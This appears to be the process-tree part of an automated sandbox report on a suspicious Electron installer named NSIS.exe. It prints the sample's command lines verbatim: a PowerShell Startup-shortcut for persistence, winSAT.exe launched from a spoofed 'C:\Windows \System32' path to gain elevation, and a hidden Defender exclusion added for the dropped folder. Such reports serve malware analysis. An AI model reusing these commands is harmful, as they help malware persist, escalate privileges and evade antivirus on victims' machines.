                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:10
                                                                                                                                                                                            Start time:11:34:00
                                                                                                                                                                                            Start date:06/12/2024
                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe"
                                                                                                                                                                                            Imagebase:0x7ff7373a0000
                                                                                                                                                                                            File size:188'826'112 bytes
                                                                                                                                                                                            MD5 hash:BD4906B9305AFEC35A88A3387BCB9FAC
                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                            • Detection: 0%, ReversingLabs
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:12
                                                                                                                                                                                            Start time:11:34:04
                                                                                                                                                                                            Start date:06/12/2024
                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\NSIS" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1740,i,4228251472899139808,8446722721828354665,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=1732 /prefetch:2
                                                                                                                                                                                            Imagebase:0x7ff7373a0000
                                                                                                                                                                                            File size:188'826'112 bytes
                                                                                                                                                                                            MD5 hash:BD4906B9305AFEC35A88A3387BCB9FAC
                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:13
                                                                                                                                                                                            Start time:11:34:03
                                                                                                                                                                                            Start date:06/12/2024
                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "$s=(New-Object -COM WScript.Shell).CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyElectronApp.lnk');$s.TargetPath='C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe';$s.Save()""
                                                                                                                                                                                            Imagebase:0x7ff7f04f0000
                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:14
                                                                                                                                                                                            Start time:11:34:03
                                                                                                                                                                                            Start date:06/12/2024
                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:15
                                                                                                                                                                                            Start time:11:34:03
                                                                                                                                                                                            Start date:06/12/2024
                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /d /s /c "powershell Start-Process -Filepath 'C:\Windows \System32\winSAT.exe' -WindowStyle Hidden"
                                                                                                                                                                                            Imagebase:0x7ff7f04f0000
                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:16
                                                                                                                                                                                            Start time:11:34:03
                                                                                                                                                                                            Start date:06/12/2024
                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:powershell -Command "$s=(New-Object -COM WScript.Shell).CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyElectronApp.lnk');$s.TargetPath='C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe';$s.Save()"
                                                                                                                                                                                            Imagebase:0x7ff788560000
                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:17
                                                                                                                                                                                            Start time:11:34:03
                                                                                                                                                                                            Start date:06/12/2024
                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:18
                                                                                                                                                                                            Start time:11:34:03
                                                                                                                                                                                            Start date:06/12/2024
                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:powershell Start-Process -Filepath 'C:\Windows \System32\winSAT.exe' -WindowStyle Hidden
                                                                                                                                                                                            Imagebase:0x7ff788560000
                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:19
                                                                                                                                                                                            Start time:11:34:05
                                                                                                                                                                                            Start date:06/12/2024
                                                                                                                                                                                            Path:C:\Windows \System32\winSAT.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Windows \System32\winSAT.exe"
                                                                                                                                                                                            Imagebase:0x7ff780f90000
                                                                                                                                                                                            File size:2'810'880 bytes
                                                                                                                                                                                            MD5 hash:FC2414F108B613366BDE7AE897AB53A1
                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                            • Detection: 0%, ReversingLabs
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:22
                                                                                                                                                                                            Start time:11:34:06
                                                                                                                                                                                            Start date:06/12/2024
                                                                                                                                                                                            Path:C:\Windows \System32\winSAT.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Windows \System32\winSAT.exe"
                                                                                                                                                                                            Imagebase:0x7ff780f90000
                                                                                                                                                                                            File size:2'810'880 bytes
                                                                                                                                                                                            MD5 hash:FC2414F108B613366BDE7AE897AB53A1
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:23
                                                                                                                                                                                            Start time:11:34:06
                                                                                                                                                                                            Start date:06/12/2024
                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:24
                                                                                                                                                                                            Start time:11:34:07
                                                                                                                                                                                            Start date:06/12/2024
                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\NSIS" --field-trial-handle=2416,i,4228251472899139808,8446722721828354665,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2412 /prefetch:3
                                                                                                                                                                                            Imagebase:0x7ff7373a0000
                                                                                                                                                                                            File size:188'826'112 bytes
                                                                                                                                                                                            MD5 hash:BD4906B9305AFEC35A88A3387BCB9FAC
                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:25
                                                                                                                                                                                            Start time:11:34:07
                                                                                                                                                                                            Start date:06/12/2024
                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "& {$UserProfile = [Environment]::GetFolderPath('UserProfile'); $TargetPath = Join-Path $UserProfile 'AppData\Roaming\MyElectronApp'; Add-MpPreference -ExclusionPath $TargetPath; }"
                                                                                                                                                                                            Imagebase:0x7ff788560000
                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:26
                                                                                                                                                                                            Start time:11:34:08
                                                                                                                                                                                            Start date:06/12/2024
                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /d /s /c "powershell Start-Process -Filepath 'C:\Windows \System32\winSAT.exe' -WindowStyle Hidden"
                                                                                                                                                                                            Imagebase:0x7ff7f04f0000
                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:27
                                                                                                                                                                                            Start time:11:34:08
                                                                                                                                                                                            Start date:06/12/2024
                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:28
                                                                                                                                                                                            Start time:11:34:08
                                                                                                                                                                                            Start date:06/12/2024
                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:powershell Start-Process -Filepath 'C:\Windows \System32\winSAT.exe' -WindowStyle Hidden
                                                                                                                                                                                            Imagebase:0x7ff788560000
                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:29
                                                                                                                                                                                            Start time:11:34:09
                                                                                                                                                                                            Start date:06/12/2024
                                                                                                                                                                                            Path:C:\Windows \System32\winSAT.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Windows \System32\winSAT.exe"
                                                                                                                                                                                            Imagebase:0x7ff780f90000
                                                                                                                                                                                            File size:2'810'880 bytes
                                                                                                                                                                                            MD5 hash:FC2414F108B613366BDE7AE897AB53A1
                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:31
                                                                                                                                                                                            Start time:11:34:10
                                                                                                                                                                                            Start date:06/12/2024
                                                                                                                                                                                            Path:C:\Windows \System32\winSAT.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Windows \System32\winSAT.exe"
                                                                                                                                                                                            Imagebase:0x7ff780f90000
                                                                                                                                                                                            File size:2'810'880 bytes
                                                                                                                                                                                            MD5 hash:FC2414F108B613366BDE7AE897AB53A1
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:32
                                                                                                                                                                                            Start time:11:34:10
                                                                                                                                                                                            Start date:06/12/2024
                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:33
                                                                                                                                                                                            Start time:11:34:10
                                                                                                                                                                                            Start date:06/12/2024
                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "& {$UserProfile = [Environment]::GetFolderPath('UserProfile'); $TargetPath = Join-Path $UserProfile 'AppData\Roaming\MyElectronApp'; $BginfoPath = Join-Path $TargetPath 'Bginfo.exe'; Start-Process -FilePath $BginfoPath -ArgumentList '/NOLICPROMPT /timer:300' -WorkingDirectory $TargetPath -WindowStyle Hidden; }"
                                                                                                                                                                                            Imagebase:0x7ff788560000
                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:34
                                                                                                                                                                                            Start time:11:34:12
                                                                                                                                                                                            Start date:06/12/2024
                                                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exe" /NOLICPROMPT /timer:300
                                                                                                                                                                                            Imagebase:0x6d0000
                                                                                                                                                                                            File size:2'198'952 bytes
                                                                                                                                                                                            MD5 hash:3AEF228FB7EE187160482084D36C9726
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                            • Detection: 0%, ReversingLabs
                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                            Target ID:37
                                                                                                                                                                                            Start time:11:34:18
                                                                                                                                                                                            Start date:06/12/2024
                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe"
                                                                                                                                                                                            Imagebase:0x7ff7373a0000
                                                                                                                                                                                            File size:188'826'112 bytes
                                                                                                                                                                                            MD5 hash:BD4906B9305AFEC35A88A3387BCB9FAC
                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                            Target ID:38
                                                                                                                                                                                            Start time:11:34:19
                                                                                                                                                                                            Start date:06/12/2024
                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "$s=(New-Object -COM WScript.Shell).CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyElectronApp.lnk');$s.TargetPath='C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe';$s.Save()""
                                                                                                                                                                                            Imagebase:0x7ff7f04f0000
                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:39
                                                                                                                                                                                            Start time:11:34:20
                                                                                                                                                                                            Start date:06/12/2024
                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\NSIS" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1800,i,11364209571960262767,7852169953357836593,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=1792 /prefetch:2
                                                                                                                                                                                            Imagebase:0x7ff7373a0000
                                                                                                                                                                                            File size:188'826'112 bytes
                                                                                                                                                                                            MD5 hash:BD4906B9305AFEC35A88A3387BCB9FAC
                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                            Target ID:40
                                                                                                                                                                                            Start time:11:34:19
                                                                                                                                                                                            Start date:06/12/2024
                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:41
                                                                                                                                                                                            Start time:11:34:19
                                                                                                                                                                                            Start date:06/12/2024
                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /d /s /c "powershell Start-Process -Filepath 'C:\Windows \System32\winSAT.exe' -WindowStyle Hidden"
                                                                                                                                                                                            Imagebase:0x7ff7f04f0000
                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:42
                                                                                                                                                                                            Start time:11:34:19
                                                                                                                                                                                            Start date:06/12/2024
                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:43
                                                                                                                                                                                            Start time:11:34:19
                                                                                                                                                                                            Start date:06/12/2024
                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:powershell -Command "$s=(New-Object -COM WScript.Shell).CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyElectronApp.lnk');$s.TargetPath='C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe';$s.Save()"
                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:44
                                                                                                                                                                                            Start time:11:34:19
                                                                                                                                                                                            Start date:06/12/2024
                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:powershell Start-Process -Filepath 'C:\Windows \System32\winSAT.exe' -WindowStyle Hidden
                                                                                                                                                                                            Imagebase:0x7ff788560000
                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:45
                                                                                                                                                                                            Start time:11:34:21
                                                                                                                                                                                            Start date:06/12/2024
                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\NSIS" --field-trial-handle=2424,i,11364209571960262767,7852169953357836593,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2420 /prefetch:3
                                                                                                                                                                                            Imagebase:0x7ff7373a0000
                                                                                                                                                                                            File size:188'826'112 bytes
                                                                                                                                                                                            MD5 hash:BD4906B9305AFEC35A88A3387BCB9FAC
                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                            Target ID:46
                                                                                                                                                                                            Start time:11:34:21
                                                                                                                                                                                            Start date:06/12/2024
                                                                                                                                                                                            Path:C:\Windows \System32\winSAT.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Windows \System32\winSAT.exe"
                                                                                                                                                                                            Imagebase:0x7ff7a98e0000
                                                                                                                                                                                            File size:2'810'880 bytes
                                                                                                                                                                                            MD5 hash:FC2414F108B613366BDE7AE897AB53A1
                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:48
                                                                                                                                                                                            Start time:11:34:21
                                                                                                                                                                                            Start date:06/12/2024
                                                                                                                                                                                            Path:C:\Windows \System32\winSAT.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Windows \System32\winSAT.exe"
                                                                                                                                                                                            Imagebase:0x7ff7a98e0000
                                                                                                                                                                                            File size:2'810'880 bytes
                                                                                                                                                                                            MD5 hash:FC2414F108B613366BDE7AE897AB53A1
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:49
                                                                                                                                                                                            Start time:11:34:22
                                                                                                                                                                                            Start date:06/12/2024
                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:50
                                                                                                                                                                                            Start time:11:34:22
                                                                                                                                                                                            Start date:06/12/2024
                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "& {$UserProfile = [Environment]::GetFolderPath('UserProfile'); $TargetPath = Join-Path $UserProfile 'AppData\Roaming\MyElectronApp'; Add-MpPreference -ExclusionPath $TargetPath; }"
                                                                                                                                                                                            Imagebase:0x7ff788560000
                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:52
                                                                                                                                                                                            Start time:11:36:20
                                                                                                                                                                                            Start date:06/12/2024
                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe
                                                                                                                                                                                            Wow64 process (32bit):false
